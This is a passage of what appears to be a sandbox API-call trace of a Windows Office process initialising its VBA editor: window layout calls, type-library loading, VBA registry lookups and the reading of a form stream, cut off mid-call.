[0041.684] OffsetRect (in: lprc=0x185cd8, dx=-8, dy=-30 | out: lprc=0x185cd8) returned 1 [0041.684] ClientToScreen (in: hWnd=0x10202, lpPoint=0x185d70 | out: lpPoint=0x185d70) returned 1 [0041.684] CopyRect (in: lprcDst=0x185d78, lprcSrc=0x185e08 | out: lprcDst=0x185d78) returned 1 [0041.684] OffsetRect (in: lprc=0x185d78, dx=-8, dy=-30 | out: lprc=0x185d78) returned 1 [0041.684] ClientToScreen (in: hWnd=0x10202, lpPoint=0x185cd0 | out: lpPoint=0x185cd0) returned 1 [0041.684] CopyRect (in: lprcDst=0x185cd8, lprcSrc=0x185d68 | out: lprcDst=0x185cd8) returned 1 [0041.684] OffsetRect (in: lprc=0x185cd8, dx=-8, dy=-30 | out: lprc=0x185cd8) returned 1 [0041.684] ClientToScreen (in: hWnd=0x10202, lpPoint=0x185cd0 | out: lpPoint=0x185cd0) returned 1 [0041.684] CopyRect (in: lprcDst=0x185cd8, lprcSrc=0x185d68 | out: lprcDst=0x185cd8) returned 1 [0041.684] OffsetRect (in: lprc=0x185cd8, dx=-8, dy=-30 | out: lprc=0x185cd8) returned 1 [0041.685] ClientToScreen (in: hWnd=0x10202, lpPoint=0x185cd0 | out: lpPoint=0x185cd0) returned 1 [0041.685] CopyRect (in: lprcDst=0x185cd8, lprcSrc=0x185d68 | out: lprcDst=0x185cd8) returned 1 [0041.685] OffsetRect (in: lprc=0x185cd8, dx=-8, dy=-30 | out: lprc=0x185cd8) returned 1 [0041.685] ClientToScreen (in: hWnd=0x10202, lpPoint=0x185d70 | out: lpPoint=0x185d70) returned 1 [0041.685] CopyRect (in: lprcDst=0x185d78, lprcSrc=0x185e08 | out: lprcDst=0x185d78) returned 1 [0041.685] OffsetRect (in: lprc=0x185d78, dx=-8, dy=-30 | out: lprc=0x185d78) returned 1 [0041.685] ClientToScreen (in: hWnd=0x10202, lpPoint=0x185e10 | out: lpPoint=0x185e10) returned 1 [0041.685] CopyRect (in: lprcDst=0x185e18, lprcSrc=0x185ea8 | out: lprcDst=0x185e18) returned 1 [0041.685] OffsetRect (in: lprc=0x185e18, dx=-8, dy=-30 | out: lprc=0x185e18) returned 1 [0041.685] ClientToScreen (in: hWnd=0x10202, lpPoint=0x185eb0 | out: lpPoint=0x185eb0) returned 1 [0041.685] CopyRect (in: lprcDst=0x185eb8, lprcSrc=0x185f48 | out: lprcDst=0x185eb8) returned 1 [0041.685] OffsetRect (in: lprc=0x185eb8, dx=-8, dy=-30 | out: lprc=0x185eb8) returned 1 [0041.685] SetWindowPos (hWnd=0x10208, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x77) returned 1 [0041.685] GetClientRect (in: hWnd=0x10208, lpRect=0x185528 | out: lpRect=0x185528) returned 1 [0041.685] IsWindow (hWnd=0x10208) returned 1 [0041.685] GetClientRect (in: hWnd=0x10208, lpRect=0x1853b0 | out: lpRect=0x1853b0) returned 1 [0041.685] GetSystemMetrics (nIndex=2) returned 17 [0041.685] MoveWindow (hWnd=0x1020a, X=-1, Y=27, nWidth=102, nHeight=56, bRepaint=1) returned 1 [0041.687] SetWindowPos (hWnd=0x1020e, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x77) returned 1 [0041.687] SendMessageA (hWnd=0x10212, Msg=0x14f, wParam=0x0, lParam=0x0) returned 0x1 [0041.687] BeginDeferWindowPos (nNumWindows=3) returned 0xb0213 [0041.687] DeferWindowPos (hWinPosInfo=0xb0213, hWnd=0x10212, hWndInsertAfter=0x0, x=0, y=0, cx=178, cy=18, uFlags=0x16) returned 0xb0213 [0041.688] GetWindowRect (in: hWnd=0x10216, lpRect=0x1856b0 | out: lpRect=0x1856b0) returned 1 [0041.688] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x1020e, lpPoints=0x1856b0, cPoints=0x2 | out: lpPoints=0x1856b0) returned -3080200 [0041.688] DeferWindowPos (hWinPosInfo=0xb0213, hWnd=0x10216, hWndInsertAfter=0x0, x=0, y=0, cx=180, cy=29, uFlags=0x116) returned 0xb0213 [0041.688] SendMessageA (hWnd=0x10216, Msg=0x1328, wParam=0x0, lParam=0x1856b0) returned 0x0 [0041.688] CallWindowProcA (lpPrevWndFunc=0xffff0211, hWnd=0x10216, Msg=0x1328, wParam=0x0, lParam=0x1856b0) returned 0x0 [0041.688] DeferWindowPos (hWinPosInfo=0xb0213, hWnd=0x10218, hWndInsertAfter=0x0, x=4, y=46, cx=172, cy=3, uFlags=0x110) returned 0xb0213 [0041.688] EndDeferWindowPos (hWinPosInfo=0xb0213) returned 1 [0041.688] CallWindowProcA (lpPrevWndFunc=0xffff0211, hWnd=0x10216, Msg=0x46, wParam=0x0, lParam=0x185630) returned 0x0 [0041.688] CallWindowProcA (lpPrevWndFunc=0xffff0211, hWnd=0x10216, Msg=0x83, wParam=0x1, lParam=0x185600) returned 0x0 [0041.689] CallWindowProcA (lpPrevWndFunc=0xffff0211, hWnd=0x10216, Msg=0x47, wParam=0x0, lParam=0x185630) returned 0x0 [0041.689] CallWindowProcA (lpPrevWndFunc=0xffff0211, hWnd=0x10216, Msg=0x5, wParam=0x0, lParam=0x1d00b4) returned 0x0 [0041.690] GetClientRect (in: hWnd=0x10218, lpRect=0x185640 | out: lpRect=0x185640) returned 1 [0041.690] SendMessageA (hWnd=0x10218, Msg=0x188, wParam=0x0, lParam=0x0) returned 0xffffffffffffffff [0041.690] InvalidateRect (hWnd=0x10216, lpRect=0x0, bErase=1) returned 1 [0041.690] InvalidateRect (hWnd=0x10218, lpRect=0x0, bErase=1) returned 1 [0041.690] InvalidateRect (hWnd=0x1021c, lpRect=0x0, bErase=1) returned 1 [0041.690] SetWindowPos (hWnd=0x10204, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x77) returned 1 [0041.690] AdjustWindowRectEx (in: lpRect=0x185fb0, dwStyle=0x86cc0000, bMenu=0, dwExStyle=0x84 | out: lpRect=0x185fb0) returned 1 [0041.690] RegisterClassA (lpWndClass=0x185f00) returned 0x1d1d0047c1aa [0041.690] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001dc) returned 1 [0041.690] CreateWindowExA (dwExStyle=0x84, lpClassName=0xc1aa, lpWindowName=0x0, dwStyle=0x86cc0000, X=25, Y=344, nWidth=603, nHeight=194, hWndParent=0x10202, hMenu=0x0, hInstance=0x7fee4230000, lpParam=0x0) returned 0x10236 [0041.691] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001dd) returned 1 [0041.691] ClientToScreen (in: hWnd=0x10236, lpPoint=0x185e70 | out: lpPoint=0x185e70) returned 1 [0041.691] CopyRect (in: lprcDst=0x185e78, lprcSrc=0x185f50 | out: lprcDst=0x185e78) returned 1 [0041.691] OffsetRect (in: lprc=0x185e78, dx=-33, dy=-370 | out: lprc=0x185e78) returned 1 [0041.691] ClientToScreen (in: hWnd=0x10236, lpPoint=0x185e10 | out: lpPoint=0x185e10) returned 1 [0041.691] CopyRect (in: lprcDst=0x185e18, lprcSrc=0x185ea8 | out: lprcDst=0x185e18) returned 1 [0041.691] OffsetRect (in: lprc=0x185e18, dx=-33, dy=-370 | out: lprc=0x185e18) returned 1 [0041.691] ClientToScreen (in: hWnd=0x10236, lpPoint=0x185e10 | out: lpPoint=0x185e10) returned 1 [0041.691] CopyRect (in: lprcDst=0x185e18, lprcSrc=0x185ea8 | out: lprcDst=0x185e18) returned 1 [0041.691] OffsetRect (in: lprc=0x185e18, dx=-33, dy=-370 | out: lprc=0x185e18) returned 1 [0041.691] ClientToScreen (in: hWnd=0x10236, lpPoint=0x185e10 | out: lpPoint=0x185e10) returned 1 [0041.691] CopyRect (in: lprcDst=0x185e18, lprcSrc=0x185ea8 | out: lprcDst=0x185e18) returned 1 [0041.691] OffsetRect (in: lprc=0x185e18, dx=-33, dy=-370 | out: lprc=0x185e18) returned 1 [0041.691] ClientToScreen (in: hWnd=0x10236, lpPoint=0x185eb0 | out: lpPoint=0x185eb0) returned 1 [0041.691] CopyRect (in: lprcDst=0x185eb8, lprcSrc=0x185f48 | out: lprcDst=0x185eb8) returned 1 [0041.691] OffsetRect (in: lprc=0x185eb8, dx=-33, dy=-370 | out: lprc=0x185eb8) returned 1 [0041.691] AdjustWindowRectEx (in: lpRect=0x185fb0, dwStyle=0x86cc0000, bMenu=0, dwExStyle=0x84 | out: lpRect=0x185fb0) returned 1 [0041.691] CreateWindowExA (dwExStyle=0x84, lpClassName=0xc1aa, lpWindowName=0x0, dwStyle=0x86cc0000, X=752, Y=103, nWidth=196, nHeight=162, hWndParent=0x10202, hMenu=0x0, hInstance=0x7fee4230000, lpParam=0x0) returned 0x10238 [0041.692] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001de) returned 1 [0041.692] ClientToScreen (in: hWnd=0x10238, lpPoint=0x185e70 | out: lpPoint=0x185e70) returned 1 [0041.692] CopyRect (in: lprcDst=0x185e78, lprcSrc=0x185f50 | out: lprcDst=0x185e78) returned 1 [0041.692] OffsetRect (in: lprc=0x185e78, dx=-760, dy=-129 | out: lprc=0x185e78) returned 1 [0041.692] ClientToScreen (in: hWnd=0x10238, lpPoint=0x185eb0 | out: lpPoint=0x185eb0) returned 1 [0041.692] CopyRect (in: lprcDst=0x185eb8, lprcSrc=0x185f48 | out: lprcDst=0x185eb8) returned 1 [0041.692] OffsetRect (in: lprc=0x185eb8, dx=-760, dy=-129 | out: lprc=0x185eb8) returned 1 [0041.692] AdjustWindowRectEx (in: lpRect=0x185fb0, dwStyle=0x86cc0000, bMenu=0, dwExStyle=0x84 | out: lpRect=0x185fb0) returned 1 [0041.692] CreateWindowExA (dwExStyle=0x84, lpClassName=0xc1aa, lpWindowName=0x0, dwStyle=0x86cc0000, X=81, Y=534, nWidth=196, nHeight=317, hWndParent=0x10202, hMenu=0x0, hInstance=0x7fee4230000, lpParam=0x0) returned 0x1023a [0041.693] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001df) returned 1 [0041.693] ClientToScreen (in: hWnd=0x1023a, lpPoint=0x185e70 | out: lpPoint=0x185e70) returned 1 [0041.693] CopyRect (in: lprcDst=0x185e78, lprcSrc=0x185f50 | out: lprcDst=0x185e78) returned 1 [0041.693] OffsetRect (in: lprc=0x185e78, dx=-89, dy=-560 | out: lprc=0x185e78) returned 1 [0041.693] ClientToScreen (in: hWnd=0x1023a, lpPoint=0x185eb0 | out: lpPoint=0x185eb0) returned 1 [0041.693] CopyRect (in: lprcDst=0x185eb8, lprcSrc=0x185f48 | out: lprcDst=0x185eb8) returned 1 [0041.693] OffsetRect (in: lprc=0x185eb8, dx=-89, dy=-560 | out: lprc=0x185eb8) returned 1 [0041.693] AdjustWindowRectEx (in: lpRect=0x185fb0, dwStyle=0x86cc0000, bMenu=0, dwExStyle=0x84 | out: lpRect=0x185fb0) returned 1 [0041.694] CreateWindowExA (dwExStyle=0x84, lpClassName=0xc1aa, lpWindowName=0x0, dwStyle=0x86cc0000, X=818, Y=162, nWidth=79, nHeight=389, hWndParent=0x10202, hMenu=0x0, hInstance=0x7fee4230000, lpParam=0x0) returned 0x1023c [0041.694] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001e0) returned 1 [0041.694] ClientToScreen (in: hWnd=0x1023c, lpPoint=0x185e70 | out: lpPoint=0x185e70) returned 1 [0041.694] CopyRect (in: lprcDst=0x185e78, lprcSrc=0x185f50 | out: lprcDst=0x185e78) returned 1 [0041.694] OffsetRect (in: lprc=0x185e78, dx=-826, dy=-188 | out: lprc=0x185e78) returned 1 [0041.694] ClientToScreen (in: hWnd=0x1023c, lpPoint=0x185eb0 | out: lpPoint=0x185eb0) returned 1 [0041.694] CopyRect (in: lprcDst=0x185eb8, lprcSrc=0x185f48 | out: lprcDst=0x185eb8) returned 1 [0041.694] OffsetRect (in: lprc=0x185eb8, dx=-826, dy=-188 | out: lprc=0x185eb8) returned 1 [0041.694] RegCloseKey (hKey=0xa2c) returned 0x0 [0041.694] QueryPathOfRegTypeLib (in: guid=0x7fee45e9a70*(Data1=0x2e157, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), wMaj=0x5, wMin=0x3, lcid=0x0, lpbstrPathName=0x185bf8 | out: lpbstrPathName=0x185bf8) returned 0x0 [0041.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6EXT.OLB", cchWideChar=-1, lpMultiByteStr=0x185b50, cbMultiByte=147, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6EXT.OLB", lpUsedDefaultChar=0x0) returned 74 [0041.697] lstrlenA (lpString="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6EXT.OLB") returned 73 [0041.697] lstrcpyA (in: lpString1=0x4de2710, lpString2="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6EXT.OLB" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6EXT.OLB") returned="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6EXT.OLB" [0041.697] _access_s (_FileName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6EXT.OLB", _AccessMode=0) returned 0x0 [0041.702] LoadTypeLib (in: szFile="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6EXT.OLB", pptlib=0x7fee460c358*=0x0 | out: pptlib=0x7fee460c358*=0x6c92d70) returned 0x0 [0041.724] IUnknown:AddRef (This=0x6c92d70) returned 0x2 [0041.724] ITypeLib:GetTypeInfoOfGuid (in: This=0x6c92d70, GUID=0x7fee45df738, ppTInfo=0x4de2738 | out: ppTInfo=0x4de2738*=0x6cb62b8) returned 0x0 [0041.724] IUnknown:Release (This=0x6c92d70) returned 0x2 [0041.724] IUnknown:AddRef (This=0x6c92d70) returned 0x3 [0041.724] IMalloc:Alloc (This=0x7feffc15380, cb=0x40) returned 0x6b85c70 [0041.724] ITypeLib:GetTypeInfoOfGuid (in: This=0x6c92d70, GUID=0x7fee45e72e0, ppTInfo=0x185f50 | out: ppTInfo=0x185f50*=0x6cb6368) returned 0x0 [0041.724] IUnknown:Release (This=0x6c92d70) returned 0x3 [0041.724] IUnknown:AddRef (This=0x6c92d70) returned 0x4 [0041.724] ITypeLib:GetTypeInfoOfGuid (in: This=0x6c92d70, GUID=0x7fee45e6d58, ppTInfo=0x4de27b8 | out: ppTInfo=0x4de27b8*=0x6cb6418) returned 0x0 [0041.725] IUnknown:Release (This=0x6c92d70) returned 0x4 [0041.725] IUnknown:AddRef (This=0x6c92d70) returned 0x5 [0041.725] ITypeLib:GetTypeInfoOfGuid (in: This=0x6c92d70, GUID=0x7fee45e6d88, ppTInfo=0x4de2848 | out: ppTInfo=0x4de2848*=0x6cb64c8) returned 0x0 [0041.725] IUnknown:Release (This=0x6c92d70) returned 0x5 [0041.725] IUnknown:AddRef (This=0x6c92d70) returned 0x6 [0041.725] ITypeLib:GetTypeInfoOfGuid (in: This=0x6c92d70, GUID=0x7fee45e6d68, ppTInfo=0x4de2960 | out: ppTInfo=0x4de2960*=0x6cb6578) returned 0x0 [0041.725] IUnknown:Release (This=0x6c92d70) returned 0x6 [0041.725] IUnknown:AddRef (This=0x6c92d70) returned 0x7 [0041.725] ITypeLib:GetTypeInfoOfGuid (in: This=0x6c92d70, GUID=0x7fee45e56c0, ppTInfo=0x4de29e8 | out: ppTInfo=0x4de29e8*=0x6cb6628) returned 0x0 [0041.725] IUnknown:Release (This=0x6c92d70) returned 0x7 [0041.725] lstrlenA (lpString="Software\\Microsoft\\VBA\\VBE\\6.0\\Addins64") returned 39 [0041.725] lstrcpyA (in: lpString1=0x2748120, lpString2="Software\\Microsoft\\VBA\\VBE\\6.0\\Addins64" | out: lpString1="Software\\Microsoft\\VBA\\VBE\\6.0\\Addins64") returned="Software\\Microsoft\\VBA\\VBE\\6.0\\Addins64" [0041.725] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\VBE\\6.0\\Addins64", phkResult=0x185fe8 | out: phkResult=0x185fe8*=0x0) returned 0x2 [0041.726] lstrcpyA (in: lpString1=0x185d40, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.726] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185d10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.726] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.726] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185ef8 | out: phkResult=0x185ef8*=0xa24) returned 0x0 [0041.726] RegOpenKeyExA (in: hKey=0xa24, lpSubKey="Designers", ulOptions=0x0, samDesired=0x20019, phkResult=0x185ee8 | out: phkResult=0x185ee8*=0x0) returned 0x2 [0041.726] RegCloseKey (hKey=0xa24) returned 0x0 [0041.726] lstrcpyA (in: lpString1=0x185d60, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.726] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185d30, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.726] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.726] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185f10 | out: phkResult=0x185f10*=0xa24) returned 0x0 [0041.726] RegOpenKeyExA (in: hKey=0xa24, lpSubKey="ToolboxControls", ulOptions=0x0, samDesired=0x20019, phkResult=0x185f08 | out: phkResult=0x185f08*=0x0) returned 0x2 [0041.726] RegCloseKey (hKey=0xa24) returned 0x0 [0041.726] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x836, lpBuffer=0x186000, cchBufferMax=40 | out: lpBuffer="CtlsShowSelected") returned 0x10 [0041.726] lstrcpyA (in: lpString1=0x185e00, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.727] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.727] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.727] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185f98 | out: phkResult=0x185f98*=0xa24) returned 0x0 [0041.727] RegQueryValueExA (in: hKey=0xa24, lpValueName="CtlsShowSelected", lpReserved=0x0, lpType=0x0, lpData=0x185fa0, lpcbData=0x185f90*=0x28 | out: lpType=0x0, lpData=0x185fa0*=0x0, lpcbData=0x185f90*=0x28) returned 0x2 [0041.727] RegCloseKey (hKey=0xa24) returned 0x0 [0041.727] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x838, lpBuffer=0x186000, cchBufferMax=40 | out: lpBuffer="DsnShowSelected") returned 0xf [0041.727] lstrcpyA (in: lpString1=0x185e00, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.727] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.727] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.727] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185f98 | out: phkResult=0x185f98*=0xa24) returned 0x0 [0041.727] RegQueryValueExA (in: hKey=0xa24, lpValueName="DsnShowSelected", lpReserved=0x0, lpType=0x0, lpData=0x185fa0, lpcbData=0x185f90*=0x28 | out: lpType=0x0, lpData=0x185fa0*=0x0, lpcbData=0x185f90*=0x28) returned 0x2 [0041.727] RegCloseKey (hKey=0xa24) returned 0x0 [0041.727] lstrcpyA (in: lpString1=0x185db0, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0041.727] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0041.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x185d80, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0041.727] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0041.727] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x185f48 | out: phkResult=0x185f48*=0xa24) returned 0x0 [0041.727] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x822, lpBuffer=0x185f50, cchBufferMax=40 | out: lpBuffer="MainWindow") returned 0xa [0041.727] RegQueryValueExA (in: hKey=0xa24, lpValueName="MainWindow", lpReserved=0x0, lpType=0x0, lpData=0x186010, lpcbData=0x185f40*=0x1e | out: lpType=0x0, lpData=0x186010*=0x0, lpcbData=0x185f40*=0x1e) returned 0x2 [0041.728] RegCloseKey (hKey=0xa24) returned 0x0 [0041.728] lstrcpyA (in: lpString1=0x186010, lpString2="" | out: lpString1="") returned="" [0041.728] lstrlenA (lpString="") returned 0 [0041.728] MonitorFromWindow (hwnd=0x10202, dwFlags=0x2) returned 0x10001 [0041.728] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x185f58 | out: lpmi=0x185f58) returned 1 [0041.728] GetWindowLongA (hWnd=0x10202, nIndex=-16) returned 114229248 [0041.728] IsZoomed (hWnd=0x10202) returned 0 [0041.728] GetWindowRect (in: hWnd=0x10202, lpRect=0x185f38 | out: lpRect=0x185f38) returned 1 [0041.728] GetCurrentDirectoryA (in: nBufferLength=0x104, lpBuffer=0x185f40 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0041.728] IUnknown:AddRef (This=0x6c92d70) returned 0x8 [0041.728] ITypeLib:GetTypeInfoOfGuid (in: This=0x6c92d70, GUID=0x7fee45df7f8, ppTInfo=0x4de2b78 | out: ppTInfo=0x4de2b78*=0x6cb66d8) returned 0x0 [0041.728] IUnknown:Release (This=0x6c92d70) returned 0x8 [0041.728] GetPropA (hWnd=0x10202, lpString="VBAutomation") returned 0x0 [0041.728] SetPropA (hWnd=0x10202, lpString="VBAutomation", hData=0x4de2b58) returned 1 [0041.729] IUnknown:AddRef (This=0x6c92d70) returned 0x9 [0041.729] ITypeLib:GetTypeInfoOfGuid (in: This=0x6c92d70, GUID=0x7fee45e6d78, ppTInfo=0x4de2be8 | out: ppTInfo=0x4de2be8*=0x6cb6788) returned 0x0 [0041.729] IUnknown:Release (This=0x6c92d70) returned 0x9 [0041.729] IUnknown:AddRef (This=0x6c92d70) returned 0xa [0041.729] ITypeLib:GetTypeInfoOfGuid (in: This=0x6c92d70, GUID=0x7fee45df7f8, ppTInfo=0x4de2c48 | out: ppTInfo=0x4de2c48*=0x6cb66d8) returned 0x0 [0041.729] IUnknown:Release (This=0x6c92d70) returned 0xa [0041.729] IUnknown:AddRef (This=0x6c92d70) returned 0xb [0041.729] ITypeLib:GetTypeInfoOfGuid (in: This=0x6c92d70, GUID=0x7fee45df7f8, ppTInfo=0x4de2cb8 | out: ppTInfo=0x4de2cb8*=0x6cb66d8) returned 0x0 [0041.729] IUnknown:Release (This=0x6c92d70) returned 0xb [0041.729] IUnknown:AddRef (This=0x6c92d70) returned 0xc [0041.729] ITypeLib:GetTypeInfoOfGuid (in: This=0x6c92d70, GUID=0x7fee45df7f8, ppTInfo=0x4de2d68 | out: ppTInfo=0x4de2d68*=0x6cb66d8) returned 0x0 [0041.730] IUnknown:Release (This=0x6c92d70) returned 0xc [0041.730] IUnknown:AddRef (This=0x6c92d70) returned 0xd [0041.730] ITypeLib:GetTypeInfoOfGuid (in: This=0x6c92d70, GUID=0x7fee45df7f8, ppTInfo=0x4de2e18 | out: ppTInfo=0x4de2e18*=0x6cb66d8) returned 0x0 [0041.730] IUnknown:Release (This=0x6c92d70) returned 0xd [0041.730] IUnknown:AddRef (This=0x6c92d70) returned 0xe [0041.730] ITypeLib:GetTypeInfoOfGuid (in: This=0x6c92d70, GUID=0x7fee45df7f8, ppTInfo=0x4de2ec8 | out: ppTInfo=0x4de2ec8*=0x6cb66d8) returned 0x0 [0041.730] IUnknown:Release (This=0x6c92d70) returned 0xe [0041.730] GetPropA (hWnd=0x1020e, lpString="VBAutomation") returned 0x0 [0041.730] SetPropA (hWnd=0x1020e, lpString="VBAutomation", hData=0x4de2ea8) returned 1 [0041.730] IUnknown:AddRef (This=0x6c92d70) returned 0xf [0041.730] ITypeLib:GetTypeInfoOfGuid (in: This=0x6c92d70, GUID=0x7fee45df7f8, ppTInfo=0x4de2fa8 | out: ppTInfo=0x4de2fa8*=0x6cb66d8) returned 0x0 [0041.730] IUnknown:Release (This=0x6c92d70) returned 0xf [0041.730] GetPropA (hWnd=0x1020c, lpString="VBAutomation") returned 0x0 [0041.730] SetPropA (hWnd=0x1020c, lpString="VBAutomation", hData=0x4de2f88) returned 1 [0041.731] IUnknown:AddRef (This=0x6c92d70) returned 0x10 [0041.731] ITypeLib:GetTypeInfoOfGuid (in: This=0x6c92d70, GUID=0x7fee45df7f8, ppTInfo=0x4de3018 | out: ppTInfo=0x4de3018*=0x6cb66d8) returned 0x0 [0041.731] IUnknown:Release (This=0x6c92d70) returned 0x10 [0041.731] GetPropA (hWnd=0x10208, lpString="VBAutomation") returned 0x0 [0041.731] SetPropA (hWnd=0x10208, lpString="VBAutomation", hData=0x4de2ff8) returned 1 [0041.732] CExposedStream::Commit () returned 0x0 [0041.732] CExposedStream::Release () returned 0x0 [0041.732] GlobalHandle (pMem=0x3c28ae0) returned 0x6e50078 [0041.732] GlobalUnlock (hMem=0x6e50078) returned 0 [0041.732] CExposedDocFile::Stat () returned 0x0 [0041.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2749fbc, cbMultiByte=-1, lpWideCharStr=0x185da0, cchWideChar=9 | out: lpWideCharStr="\x03VBFrame") returned 9 [0041.732] CExposedDocFile::OpenStream () returned 0x0 [0041.732] CExposedStream::Stat () returned 0x0 [0041.732] GlobalLock (hMem=0x6e50078) returned 0x3c28ae0 [0041.733] GlobalSize (hMem=0x6e50078) returned 0x200 [0041.733] CExposedStream::Read () returned 0x0 [0041.733] SetCursor (hCursor=0x10007) returned 0x10003 [0041.733] lstrcmpiA (lpString1="VERSION", lpString2="VERSION") returned 0 [0041.733] lstrcmpiA (lpString1="Begin", lpString2="Begin") returned 0 [0041.733] CLSIDFromString (in: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", pclsid=0x185df8 | out: pclsid=0x185df8*(Data1=0xc62a69f0, Data2=0x16dc, 